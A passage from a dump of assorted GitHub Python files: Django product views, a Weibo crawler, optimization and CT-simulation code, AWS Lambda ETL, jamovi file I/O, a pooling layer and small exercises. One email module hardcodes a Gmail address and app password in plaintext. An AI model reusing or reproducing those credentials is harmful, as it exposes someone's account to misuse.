hasattr(product, 'condition'):\n self.fields['condition'] = forms.CharField(label='Condition')\n\n #RentalProduct Fields\n if hasattr(product, 'is_rented'):\n self.fields['is_rented'] = forms.BooleanField(label='Is rented', required=False)\n if hasattr(product, 'due_date'):\n self.fields['due_date'] = forms.DateField(label='Due Date', required=False)\n\n\n def 
commit(self, product):\n '''Process the form action'''\n product.name = self.cleaned_data.get('name')\n product.category = self.cleaned_data.get('category')\n product.price = self.cleaned_data.get('price')\n product.graphic = self.cleaned_data.get('graphic')\n #BulkProduct\n if hasattr(product, 'barcode'):\n product.barcode = self.cleaned_data.get('barcode')\n if hasattr(product, 'quantity'):\n product.quantity = self.cleaned_data.get('quantity')\n if hasattr(product, 'reorder_trigger'):\n product.reorder_trigger = self.cleaned_data.get('reorder_trigger')\n if hasattr(product, 'reorder_quantity'):\n product.reorder_quantity = self.cleaned_data.get('reorder_quantity')\n #UniqueProduct\n if hasattr(product, 'serial_number'):\n product.serial_number = self.cleaned_data.get('serial_number')\n if hasattr(product, 'condition'):\n product.condition = self.cleaned_data.get('condition')\n #RentalProduct\n if hasattr(product, 'is_rented'):\n product.is_rented = self.cleaned_data.get('is_rented')\n if hasattr(product, 'due_date'):\n product.due_date = self.cleaned_data.get('due_date')\n #############\n product.save()\n\n\n\n##################################################################################\n''' DELETING A PRODUCT'''\n\n@view_function\n@permission_required('catalog.delete_product')\ndef delete(request):\n try:\n product = cmod.Product.objects.get(id=request.urlparams[0])\n except cmdo.Product.DoesNotExist:\n return HttpResponseRedirect('/manager/products/')\n\n product.delete()\n return HttpResponseRedirect('/manager/products/')\n","repo_name":"jfed8/MusicStore","sub_path":"fomo/manager/views/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3818722700","text":"import urllib.parse\nfrom usrs_login import Usr_batch_login\nfrom main_crawler import Crawler\nimport imp\nimport sys\nimport time\nfrom sys import argv\nimport os\n\"\"\"\nt = Usr_batch_login(num_usrs=39)\nt.login()\n\n\n\n\"\"\"\ndef compare(d1, d2):\n\tfor i in range(3):\n\t\tif d1[i] > d2[i]:\n\t\t\treturn 1\n\t\telif d1[i] < d2[i]:\n\t\t\treturn -1\n\treturn 0\ndef next(d):\n\tnd = [0, 0, 0]\n\tnd[2] = d[2]+1\n\tif (nd[2] == 32 and d[1] in [1, 3, 5, 7, 8, 10, 12]) or (nd[2] == 31 and d[1] in [4, 6, 9, 11]) or (nd[2] == 30 and d[1] == 2) or (nd[2] == 29 and d[1] == 2 and (d[0]%400 == 0 or (d[0]%4 == 0 and d[0]%100 >0))):\n\t\tnd[2] = 1\n\t\tnd[1] = d[1]+1\n\t\tif nd[1] == 13:\n\t\t\tnd[1] = 1\n\t\t\tnd[0] = d[0]+1\n\t\telse:\n\t\t\tnd[0] = d[0]\n\telse:\n\t\tnd[1], nd[0] = d[1], d[0]\n\treturn nd\nif __name__ == \"__main__\":\n\ttaskf, start_date, end_date, data_dir, gap = argv[1], argv[2], argv[3], argv[4], argv[5]\n\tif len(argv) == 7:\n\t\tstatus = {'keyword':argv[6]}\n\telse:\n\t\tstatus = {}\n\tinf = open(taskf, 'r')\n\tkeywords = []\n\tfor line in inf:\n\t\tif not (line[:-1] in keywords):\n\t\t\tkeywords.append(line[:-1])\n\tinf.close()\n\tsd = start_date.split('-')\n\tsd = [int(item) for item in sd]\n\ted = end_date.split('-')\n\ted = [int(item) for item in ed]\n\ttry:\n\t\tos.mkdir(data_dir)\n\texcept:\n\t\tpass\n\t#time.sleep(3600)\n\t\"\"\"\n\tl = Usr_batch_login(num_usrs=40)\n\tl.login()\n\texit()\n\t\"\"\"\n\twhile compare(sd, ed) <= 0:\n\t\tssd = [str(item) if len(str(item)) > 1 else '0'+str(item) for item in sd]\n\t\tdate = '-'.join(ssd)\n\t\ttry:\n\t\t\tos.mkdir(data_dir+'/'+date)\n\t\texcept:\n\t\t\tpass\n\t\tfor keyword in 
keywords:\n\t\t\ttry:\n\t\t\t\tos.mkdir(data_dir+'/'+date+'/'+keyword)\n\t\t\texcept:\n\t\t\t\tpass\n\t\twhile True:\n\t\t\tt = Crawler(num_usr_th=36, keywords=keywords, date=date, data_dir=data_dir+'/'+date, status=status, gap=gap)\n\t\t\tstatus = t.crawl()\n\t\t\tif status == {}:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tl = Usr_batch_login(num_usrs=40)\n\t\t\t\tl.login()\n\t\tsd = next(sd)\n#print ()\n\n#print ()\n\n\n","repo_name":"chaozc/sina_weibo_crawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25529314582","text":"from lab4.brent import *\r\nfrom sympy import *\r\nimport numpy as np\r\nfrom re import findall\r\nfrom re import sub\r\n\r\n\r\nclass AdjGrad:\r\n def find(self, z, x, e, flag1, flag2, extr):\r\n c = 0\r\n func = sympify(z)\r\n l = Symbol('l')\r\n lst_xi = np.sort(list(set(findall(r'[x]\\d', z))))\r\n\r\n grad = []\r\n for i in range(len(lst_xi)):\r\n grad.append(func.diff(lst_xi[i]))\r\n x = np.array(x)\r\n j = 0\r\n while True:\r\n i = 0\r\n su = dict(zip(lst_xi, x))\r\n calc_grad = []\r\n for k in range(len(lst_xi)):\r\n calc_grad.append(grad[k].subs(su))\r\n calc_grad = np.array(calc_grad)\r\n S = -1 * calc_grad\r\n x_jk = x\r\n\r\n while i + 1 < len(lst_xi):\r\n\r\n lam = x + l * S\r\n su1 = dict(zip(lst_xi, lam))\r\n f_l = str(func.subs(su1))\r\n f_l = sub(r'l', r'x', f_l)\r\n lam = BrentMet()\r\n\r\n l_min = lam.find(f_l, -100, 100, e * 10, 100)\r\n # minimize(lambdify('x', sympify(f_l)), [0])['x'][0]\r\n\r\n x_jk_1 = x_jk + l_min * S\r\n\r\n su_xjk_1 = dict(zip(lst_xi, x_jk_1))\r\n calc_grad_xjk_1 = []\r\n for k in range(len(lst_xi)):\r\n calc_grad_xjk_1.append(grad[k].subs(su_xjk_1))\r\n calc_grad_xjk_1 = np.array(calc_grad_xjk_1)\r\n\r\n sum_grad = (calc_grad ** 2).sum()\r\n sum_grad_k = (calc_grad_xjk_1 ** 2).sum()\r\n Skj = -1 * calc_grad_xjk_1 + (sum_grad_k / sum_grad) * S\r\n\r\n met_Skj = (Skj ** 2).sum() ** (1 / 2)\r\n #su_after = su_xjk_1\r\n\r\n x_beauty = x_jk_1\r\n if flag1 == 1:\r\n print(tuple(x_beauty))\r\n\r\n x_met = ((x_jk_1 - x_jk) ** 2).sum() ** (1 / 2)\r\n # Написать датасеты использовать x_beauty\r\n if extr == 0:\r\n\r\n if (met_Skj < e) or (x_met < e):\r\n #print(f'Минимум в точке {tuple(x_beauty)}')\r\n #print(f'Значение функции в точке минимума {float(func.subs(su_after))}')\r\n c = 1\r\n break\r\n else:\r\n if (met_Skj < e) or (x_met < e):\r\n #print(f'Максимум в точке {tuple(x_beauty)}')\r\n #print(f'Значение функции в точке максимума {float(func.subs(su_after))}')\r\n c = 1\r\n break\r\n x_jk = x_jk_1\r\n S = Skj\r\n i += 1\r\n if c == 1:\r\n break\r\n x = x_jk\r\n j += 1\r\n return x_beauty\r\n\r\n#function = AdjGrad()\r\n#function.find('0.95*x1 + 0.95*x2 + 0.5*(-1.0*x1 + 1.0*x2 + 1)**2', [0, 0], 0.0001, 0, 0, 0)\r\n","repo_name":"dartnow21/lab4","sub_path":"AdjGrad.py","file_name":"AdjGrad.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10450535720","text":"import queue\nimport threading\nfrom dadivity_constants import *\nimport dadivity_config\nimport send_email\nimport time\nimport logging\n\nMAX_RETRIES = 4\nRESET_FLAG = -1\nHOUR = 60 * 60\n\nclass Email_Retry_Manager(object):\n \"\"\" Retry sending email after an error.\n\n Interval between retries becomes progressivly longer if attempts\n continue to fail.\n \"\"\"\n\n def __init__(self, event_queue, destination_list, 
test_flags=[]):\n self._q = event_queue\n self._destination_list = destination_list\n self._retry_counter = RESET_FLAG\n self._retry_timer = None\n self._test_flags = test_flags\n self._msg = \"\"\n self._subject = \"\"\n if FAST_RETRY in self._test_flags:\n self._base_wait = 1 # seconds\n elif FAST_MODE in self._test_flags:\n self._base_wait = 10\n else:\n self._base_wait = HOUR\n\n def start_retrying(self, subject, msg):\n \"\"\" Call this the first time to start the retry process.\n\n After the first time, retries are handled in motion_email_retry.\n \"\"\"\n self._msg = msg\n self._subject = subject\n if self._retry_timer != None:\n self._retry_timer.cancel()\n self._retry_timer = threading.Timer(self._base_wait, self._q.put, [self])\n self._retry_timer.start()\n self._retry_counter = 1\n\n def retry_again(self):\n \"\"\" Schedule another retry.\"\"\"\n if self._retry_counter < MAX_RETRIES:\n wait_multiplier = 2 ** self._retry_counter # 2, 4, 8\n self._retry_timer = threading.Timer(self._base_wait * wait_multiplier,\n self._q.put, [self])\n self._retry_timer.start()\n self._retry_counter += 1\n else:\n self._retry_counter = RESET_FLAG\n\n def reset(self):\n self._retry_counter = RESET_FLAG\n if self._retry_timer != None:\n self._retry_timer.cancel()\n\n def callback(self):\n return {\"event\":RETRY_MOTION_EMAIL}\n\n def motion_email_retry(self):\n \"\"\" Try to send again.\n\n Called after timer puts instance of self in queue and callback returns\n a message which is dispatched as a call to this method.\n \"\"\"\n email_error = None\n current_retry_counter = self._retry_counter\n # save current value because it's incremented in retry_again()\n logging.debug(\"current_retry_counter = \" + str(current_retry_counter))\n if self._retry_counter != RESET_FLAG:\n message = \"retry # \" + str(self._retry_counter) + \"\\n\" + self._msg\n email_error = send_email.dadivity_send(self._subject,\n self._destination_list,\n message,\n self._test_flags)\n if email_error != None:\n self.retry_again()\n\n return {\"event\":EMAIL_RETRY, \"email_error\":email_error, \"retry_counter\":current_retry_counter}\n\n########################################################################\n#\n# The rest is testing stuff\n#\n########################################################################\n\nif __name__ == \"__main__\":\n\n # debugging stuff, normally commented out.\n #from pudb import set_trace; set_trace()\n logging.basicConfig(level=logging.DEBUG)\n\n ONE_YEAR_TIMEOUT = 365 * 24 * 60 *60\n\n per_hour_counters = [0] * 24\n event_queue = queue.Queue()\n erm = Email_Retry_Manager(event_queue,\n dadivity_config.email_recipients,\n test_flags=[FAST_RETRY, MOCK_ERROR, JUST_PRINT_MESSAGE])\n erm.start_retrying(\"test subject\", \"test message\")\n\n try:\n\n for i in range(10):\n event = event_queue.get(timeout=ONE_YEAR_TIMEOUT)\n message = event.callback()\n print(repr(message))\n if message[\"event\"] == RETRY_MOTION_EMAIL:\n erm.motion_email_retry()\n print(time.asctime())\n print(\"\\n*********************************************\\n\")\n # if i == 2:\n # erm.reset()\n # print \"\\n---------- reset ---------\\n\"\n\n except KeyboardInterrupt: pass\n\n","repo_name":"dmclane/dadivity_motion_mon","sub_path":"email_retry_manager.py","file_name":"email_retry_manager.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12998969098","text":"import awswrangler as wr\nimport pandas as pd\nimport 
urllib.parse\nimport os\n\n# Enviroment variables\nos_input_s3_cleansed_layer = os.environ['s3_cleansed_layer']\nos_input_glue_catalog_db_name = os.environ['glue_catalog_db_name']\nos_input_glue_catalog_table_name = os.environ['glue_catalog_table_name']\nos_input_write_data_operation = os.environ['write_data_operation']\n\n\ndef lambda_handler(event, context):\n # Get object from the event and show its content type\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n try:\n \n # Create Database if not exists\n databases = wr.catalog.databases()\n \n if os_input_glue_catalog_db_name not in databases.values:\n wr.catalog.create_database(os_input_glue_catalog_db_name)\n print(databases)\n else:\n print(f\"Database {os_input_glue_catalog_db_name} already exists\")\n \n \n # Creating DF from content\n df_raw = wr.s3.read_json('s3://{}/{}'.format(bucket, key))\n\n # Extract required columns:\n df_step_1 = pd.json_normalize(df_raw['items'])\n \n # convert id from string to int\n df_step_1['id'] = pd.to_numeric(df_step_1['id'])\n \n print(df_step_1.info())\n\n # Write to S3\n wr_response = wr.s3.to_parquet(\n df=df_step_1,\n path=os_input_s3_cleansed_layer,\n dataset=True,\n database=os_input_glue_catalog_db_name,\n table=os_input_glue_catalog_table_name,\n mode=os_input_write_data_operation\n )\n\n return wr_response\n except Exception as e:\n print(e)\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\n raise e\n","repo_name":"FelipeTe/youtube-elt-aws","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35244679984","text":"import torch\nimport xraylib\nfrom torch.utils.checkpoint import checkpoint as checkpoint_gradients\n\n\ndef mass_attenuation(energies, compound):\n \"\"\"\n Total X-ray absorption for a given compound in cm2g.\n Units: KeV.\n\n \"\"\"\n attenuations = [xraylib.CS_Total_CP(compound, e.item()) for e in energies]\n return torch.tensor(attenuations, device=energies.device)\n\n\ndef bremsstrahlung(energies, energy_max):\n r\"\"\"\n Simple bremstrahlung model (Kramer formula). 
Emax\n \"\"\"\n # Kramer:\n spectrum = energy_max / energies - 1\n spectrum[spectrum < 0] = 0\n return spectrum / spectrum.mean()\n\n\ndef scintillator_efficiency(energies, compound, rho, thickness):\n \"\"\"\n Generate QDE of a detector (scintillator).\n Units: KeV, g/cm3, mm.\n\n References: 10.3390/jimaging6040018, 10.1118/1.595357, 10.1109/23.682433\n\n \"\"\"\n # Attenuation by the photoelectric effect:\n photoelectric = [xraylib.CS_Photo_CP(compound, e.item()) for e in energies]\n photoelectric = torch.tensor(photoelectric, device=energies.device)\n spectrum = 1 - torch.exp(-rho * photoelectric * thickness/10)\n spectrum *= energies # spectral response is assumed to be proportional to E\n return spectrum / spectrum.mean()\n\n\ndef total_transmission(energies, compound, rho, thickness):\n \"\"\"\n Compute fraction of x-rays transmitted through the filter.\n Units: KeV, g/cm3, mm.\n\n \"\"\"\n return torch.exp(-rho * mass_attenuation(energies, compound) * thickness/10)\n\n\ndef effective_spectrum(energies, acceleration_voltage=90.0, filter=None, detector=None):\n \"\"\"\n Generate an effective spectrum of a CT scanner.\n Units: keV, kV.\n\n \"\"\"\n if filter is None:\n filter = {'material': 'Al', 'density': 2.7, 'thickness': 2.5}\n if detector is None:\n detector = {'material': 'CsI', 'density': 4.51, 'thickness': 0.5}\n # Tube:\n spectrum = bremsstrahlung(energies, acceleration_voltage)\n # Filter:\n spectrum *= total_transmission(energies, filter['material'],\n filter['density'], filter['thickness'])\n # Detector:\n spectrum *= scintillator_efficiency(energies, detector['material'],\n detector['density'], detector['thickness'])\n return spectrum / spectrum.mean()\n\n\ndef bilinear_attenuation(energies, Z_rel):\n \"\"\"\n Bilinear parametrization of X-ray absorption spectra of Martinez et al.\n Units: keV, unitless, g/cm3.\n\n Reference: 10.1016/j.apradiso.2015.09.014\n\n \"\"\"\n reference_mu = mass_attenuation(energies, 'H2O')\n\n def alpha(energies):\n A1 = 12179.0\n p = 2.8\n return 1 / (1 + A1*torch.pow(energies, -p))\n\n return reference_mu * (alpha(energies)*(1 - Z_rel**3.21) + Z_rel**3.21)\n\n\ndef spectral_projection(projector, energies, effective_spectrum,\n density_vols, compounds=None, Z_rels=None):\n \"\"\"\n Simulate projections taking integration over spectral domain into account.\n\n \"\"\"\n if compounds is not None and Z_rels is None:\n attenuations = torch.stack([mass_attenuation(energies, x) for x in compounds])\n elif Z_rels is not None and compounds is None:\n attenuations = torch.stack([bilinear_attenuation(energies, x) for x in Z_rels])\n else:\n raise ValueError('One of `compounds` or `Z_rels` should be specified.')\n\n density_projs = torch.stack([projector(x) for x in density_vols])\n\n def counts_E(intensity_E, density_projs, attenuations_E):\n # Beer-Lambert law for multiple materials at a given photon energy\n absorbance_E = torch.tensordot(density_projs, attenuations_E, dims=[[0], [0]])\n return intensity_E * torch.exp(-absorbance_E)\n\n if any([effective_spectrum.requires_grad, density_projs.requires_grad,\n attenuations.requires_grad]):\n # We probably do pipeline optimization (i.e. multiple function calls),\n # so compilation is justified\n counts_E_compiled = torch.jit.script(counts_E)\n # We are typically limited by memory if backward pass needs to be\n # calculated. 
Use gradient checkpointing to trade compute for memory\n counts_E = lambda *x: checkpoint_gradients(counts_E_compiled, *x)\n\n simulated_counts = torch.zeros_like(density_projs[0])\n for intensity_E, attenuations_E in zip(effective_spectrum, attenuations.T):\n simulated_counts += counts_E(intensity_E, density_projs, attenuations_E)\n simulated_counts /= effective_spectrum.sum()\n simulated_ints = -torch.log(simulated_counts)\n\n return simulated_ints\n","repo_name":"schoonhovenrichard/AutodiffCTWorkflows","sub_path":"autodiffCT/tomography/spectral.py","file_name":"spectral.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73681980963","text":"count = 0\nwith open(\"D:/word.txt\", \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n for word in line.replace(\"\\n\", \"\").split(\" \"):\n print(word)\n if word == \"itheima\":\n count += 1\nprint(count)\n# with open(\"D:/word.txt\", \"r\", encoding=\"utf-8\") as fp:\n# count = fp.read().count(\"itheima\")\n# print(count)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"leezanla/pythonpractice","sub_path":"文件/文件的打开.py","file_name":"文件的打开.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17972848967","text":"import random\r\nnummer = random.randint(1, 100)\r\n\r\nplayer_name = input(\"Hallo wie lautet dein Name?: \")\r\nversuche = 0\r\nprint(\"okay,\" + player_name + \" Du kannst anfangen eine Zahl zwischen 1 und 100 zu erraten\")\r\n\r\nwhile versuche < 6:\r\n raten = int(input())\r\n versuche += 1\r\n if raten < nummer:\r\n print(\"Zu niedrig\")\r\n if raten > nummer:\r\n print(\"Zu hoch\")\r\n if raten == nummer:\r\n break\r\nif raten == nummer:\r\n print(\"Du hast die Zahl in \" + str(versuche) + \" Versuchen erraten, und dir somit meinen Schatz verdient! \")\r\nelse:\r\n print(\"Du hast die Zahl nicht erraten die Zahl lautet: \" + str(nummer))\r\n\r\ninput(\"Drücke die Enter Taste um das Programm zu schließen\")\r\n","repo_name":"JustBurak01/Projects","sub_path":"Python/Burak_ZahlenRaten.py","file_name":"Burak_ZahlenRaten.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18743773445","text":"\nimport os\nimport os.path\nimport errno\nimport re\nimport importlib\n\nfrom collections import OrderedDict\n\nfrom .exceptions import FileReadError\nfrom .exceptions import FileWriteError\n\nfrom . import omv\nfrom . import blank\n\n_readers = None\n_writers = None\n\n\n__all__ = (FileReadError, FileWriteError) # prevent flake whining F401\n\n\ndef _init():\n global _readers\n global _writers\n\n _readers = OrderedDict()\n _writers = OrderedDict()\n\n plugins = os.listdir(os.path.dirname(__file__))\n plugins_py = list(filter(lambda x: x.endswith('.py'), plugins))\n if len(plugins_py) > 0:\n plugins = plugins_py\n plugins = filter(lambda x: x != '__init__.py', plugins)\n plugins = map(lambda x: '.' + x[:-3], plugins)\n else:\n plugins = filter(lambda x: x.endswith('.pyc'), plugins)\n plugins = filter(lambda x: x != '__init__.pyc', plugins)\n plugins = map(lambda x: '.' 
+ x[:-4], plugins)\n\n plugins = list(sorted(plugins))\n\n for plugin in plugins:\n module = importlib.import_module(plugin, 'jamovi.server.formatio')\n if hasattr(module, 'get_readers'):\n module_readers = module.get_readers()\n module_readers = map(lambda x: (x[0], x), module_readers)\n _readers.update(module_readers)\n if hasattr(module, 'get_writers'):\n module_writers = module.get_writers()\n module_writers = map(lambda x: (x[0], x), module_writers)\n _writers.update(module_writers)\n\n\ndef get_readers():\n global _readers\n if _readers is None:\n _init()\n return _readers\n\n\ndef get_writers():\n global _writers\n if _writers is None:\n _init()\n return _writers\n\n\ndef read(data, path, prog_cb, settings, *, is_temp=False, title=None, ext=None):\n\n if title:\n data.title = title\n else:\n data.title, _ = os.path.splitext(os.path.basename(path))\n\n if ext is None:\n ext = os.path.splitext(path)[1].lower()\n if ext != '':\n ext = ext[1:]\n\n prog_cb(0)\n\n if path == '':\n blank.read(data)\n elif not os.path.exists(path):\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)\n elif ext == 'omv':\n omv.read(data, path, prog_cb)\n if not is_temp:\n data.path = path\n data.save_format = 'jamovi'\n elif ext == 'omt':\n omv.read(data, path, prog_cb)\n else:\n _import(data, path, prog_cb, settings, ext)\n\n fix_column_names(data)\n\n data.setup()\n\n\ndef _import(data, path, prog_cb, settings, ext):\n readers = get_readers()\n\n if ext is None:\n ext = os.path.splitext(path)[1].lower()[1:]\n\n if ext in readers:\n readers[ext][1](data, path, prog_cb, settings=settings)\n else:\n raise RuntimeError('Unrecognised file format')\n\n # if not is_temp:\n # data.import_path = path\n #\n # if _should_embed(path):\n # try:\n # embedded_name = os.path.basename(path)\n # embedded_path = 'orig' + os.path.splitext(embedded_name)[1].lower()\n # embedded_abs_path = os.path.join(data.instance_path, embedded_path)\n # shutil.copy(path, embedded_abs_path)\n # data.embedded_path = embedded_path\n # data.embedded_name = embedded_name\n # except OSError as e:\n # print(e)\n # pass\n\n\ndef write(data, path, prog_cb, content=None):\n writers = get_writers()\n\n try:\n temp_path = path + '.tmp'\n ext = os.path.splitext(path)[1].lower()[1:]\n if ext == 'omv' or ext == 'omt':\n omv.write(data, temp_path, prog_cb, content, is_template=(ext == 'omt'))\n elif ext in writers:\n writers[ext][1](data, temp_path, prog_cb)\n else:\n raise RuntimeError('Unrecognised file format')\n os.replace(temp_path, path)\n except Exception as e:\n try:\n os.remove(temp_path)\n except Exception:\n pass\n raise e\n\n\ndef is_supported(path):\n readers = get_readers()\n ext = os.path.splitext(path)[1].lower()[1:]\n return (ext in ('omv', 'omt')\n or ext in readers\n or ext in ('pdf', 'html', 'htm'))\n\n\ndef fix_column_names(dataset):\n\n dataset = dataset._dataset\n\n column_names = map(lambda column: column.name, dataset)\n column_names = list(column_names)\n\n for i, name in enumerate(column_names):\n name = re.sub(r'[\\s]+', ' ', name)\n column_names[i] = name\n\n for i, orig in enumerate(column_names):\n used = column_names[:i]\n if orig == '':\n orig = gen_column_name(i)\n else:\n orig = re.sub(r'`', '_', orig)\n orig = re.sub(r'^\\.', '_', orig)\n\n name = orig.strip()\n c = 2\n while name in used:\n name = '{} ({})'.format(orig, c)\n c += 1\n column_names[i] = name\n\n for i, name in enumerate(column_names):\n column = dataset[i]\n if column.name != name:\n column.name = name\n column.import_name = 
name\n\n\ndef gen_column_name(index):\n name = ''\n while True:\n i = index % 26\n name = chr(i + 65) + name\n index -= i\n index = int(index / 26)\n index -= 1\n if index < 0:\n break\n return name\n\n\n# def _should_embed(path):\n# import_cond = settings.get('embedCond')\n#\n# if import_cond == 'never':\n# return False\n# elif import_cond == 'always':\n# return True\n# else:\n# m = re.compile(r'^\\< ([1-9][0-9]*) ([KMB])b$', re.IGNORECASE).match(import_cond)\n# if m is None:\n# return False\n#\n# num = int(m.group(1))\n# mul = m.group(2).upper()\n# if mul == 'K':\n# max_embed = num * 1024\n# elif mul == 'M':\n# max_embed = num * 1024 * 1024\n# elif mul == 'G':\n# max_embed = num * 1024 * 1024 * 1024\n# else:\n# max_embed = 0\n#\n# return os.path.getsize(path) < max_embed\n","repo_name":"jamovi/jamovi","sub_path":"server/jamovi/server/formatio/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","stars":481,"dataset":"github-code","pt":"54"} +{"seq_id":"9149468742","text":"def day3():\n data = open(r'Inputs\\day3.in').read().splitlines()\n print('Part 1 result: ' + str(part1(data, 3, 1)))\n print('Part 2 result: ' + str(part2(data)))\n\ndef part1(data, right, down):\n x = 0\n dx = right # change in x\n dy = down # change in y\n trees = 0 # number of trees\n\n # loop through the rows, starting at 0 and increasing by the change in y each time\n for y in range(0, len(data), dy):\n # if our current spot is a # increment trees\n if (data[y][x] == \"#\"):\n trees += 1\n # increase x by the change in x value and then mod it with the length of the row\n # this handles the pattern looping\n x = (x + dx) % len(data[0])\n return trees\n\ndef part2(data):\n # each of these is one slope we want to try on the same algorithm\n slopes = [(1,1), (3,1), (5,1), (7,1), (1,2)]\n total = 1\n # run part 1 with each of the slopes in the list\n # multiplying the results by each other\n for slope in slopes:\n total *= part1(data, slope[0], slope[1])\n return total\n\nday3()","repo_name":"qkleinfelter/AdventOfCode2020","sub_path":"Solutions/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27777541200","text":"# -*- coding: utf-8 -*-\n\nimport smtplib\nimport ssl\nimport datetime\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n# Requires icalendar package: pip install icalendar\nfrom icalendar import Calendar, Event\n\n\"\"\"\nGmail profile:\n - Email: development.test.700@gmail.com\n - Password: nozx taub jlqc vhus (App password)\n\"\"\"\n\n\ndef send_email(args: dict = None) -> bool:\n \"\"\"This function sends an email with a calendar event.\n\n Args:\n args (dict, optional): Defaults to None.\n\n Returns:\n bool: True if the email was sent successfully, False otherwise.\n \"\"\"\n # Setting up the email receiver and sender\n port = 465\n smtp_server = \"smtp.gmail.com\"\n sender_email = \"development.test.700@gmail.com\"\n receiver_email = args[\"to\"]\n password = \"nozx taub jlqc vhus\"\n\n # Creating the email message\n msg = MIMEMultipart()\n\n html = \"\"\"\n \n \n \n \n \n

A new task has been created!

\n

Here is the calendar appointment 😎

\n \n \n \"\"\"\n msg.attach(MIMEText(html, 'html'))\n\n # Creating the calendar event\n cal = Calendar()\n event = Event()\n event.add('summary', args[\"summary\"])\n year = int(args[\"year\"])\n month = int(args[\"month\"])\n day = int(args[\"day\"])\n event.add('dtstart', datetime.datetime(year, month, day, 0, 0, 0))\n event.add('dtend', datetime.datetime(year, month, day, 23, 59, 59))\n event.add('dtstamp', datetime.datetime.now())\n cal.add_component(event)\n\n # Attaching the calendar event to the email message\n ics = MIMEText(cal.to_ical().decode(), \"calendar;method=REQUEST\")\n ics.add_header('Content-Disposition', 'attachment', filename='invite.ics')\n msg.attach(ics)\n\n # Sending the email\n try:\n msg['Subject'] = \"New task!\"\n msg['From'] = sender_email\n msg['To'] = receiver_email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(sender_email, password)\n server.send_message(msg, from_addr=sender_email,\n to_addrs=receiver_email)\n except Exception as e:\n return False\n return True\n","repo_name":"Isaac-PM/to-do-list","sub_path":"app/presentation/notification_manager.py","file_name":"notification_manager.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73866627042","text":"import numpy as np\r\nfrom nn.conv_util import ConvUtil\r\nfrom nn.activators import Identity\r\nfrom nn.base import Base\r\n\r\n\r\nclass MaxPooling(Base):\r\n def __init__(self, input_width, input_height, channel_number, filter_width, filter_height, stride):\r\n Base.__init__(self)\r\n self.channel_number = channel_number\r\n self.filter_width = filter_width\r\n self.filter_height = filter_height\r\n self.stride = stride\r\n self.output_width = int((input_width - filter_width) / self.stride + 1)\r\n self.output_height = int((input_height - filter_height) / self.stride + 1)\r\n self.output = np.zeros((self.channel_number, self.output_height, self.output_width))\r\n self.input_array = None\r\n self.learning_rate = None\r\n self.activator = Identity\r\n\r\n def forward(self, input_array):\r\n self.input_array = input_array\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n patch = ConvUtil.get_patch(input_array, i, j, self.filter_width, self.filter_height, self.stride)\r\n self.output[:, i, j] = np.max(patch, (-2, -1))\r\n\r\n def backward(self, sensitivity, learning_rate):\r\n self.learning_rate = learning_rate\r\n self.pre_delta = np.zeros(self.input_array.shape)\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n patch = ConvUtil.get_patch(self.input_array, i, j, self.filter_width, self.filter_height, self.stride)\r\n for d in range(self.channel_number):\r\n k, l = self.get_max_index(patch[d])\r\n self.pre_delta[d, i * self.stride + k, j * self.stride + l] = sensitivity[d, i, j]\r\n self.pre_delta *= self.pre_activator.backward(self.input_array)\r\n\r\n @staticmethod\r\n def get_max_index(array):\r\n \"\"\"\r\n Get index of max value in 2D array.\r\n \"\"\"\r\n pos = int(np.argmax(array))\r\n max_i, max_j = divmod(pos, array.shape[1])\r\n return max_i, max_j\r\n","repo_name":"administrator-zero/agent_yang","sub_path":"nn/max_pooling.py","file_name":"max_pooling.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73592709603","text":"import time\n\n\nclass 
